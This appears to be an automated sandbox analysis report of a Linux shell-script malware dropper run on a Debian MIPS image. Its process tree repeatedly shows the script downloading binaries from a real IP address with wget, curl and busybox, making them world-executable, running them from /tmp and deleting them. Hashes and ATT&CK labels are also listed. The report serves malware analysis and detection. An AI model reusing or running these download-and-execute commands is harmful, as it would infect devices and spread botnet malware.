Analysis
-
max time kernel
95s -
max time network
97s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:706
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:718
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:730
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:752
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:754
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:759
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:761
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:766
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:773
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:777
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:779
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:781
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:783
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:790
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:796
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:800
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:802
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:804
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:805
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:814
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:839
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:842
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:849
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:851
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:856
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:857
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:859
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:860
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:861
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:862
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:863
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:864
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:865
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:868
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:869
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:871
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:877
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:879
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:883
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:889
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:895
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:901
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:907
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:913
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:919
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:925
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:931
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:937
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:943
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:945
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:949
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:955
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:961
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:967
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:973
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97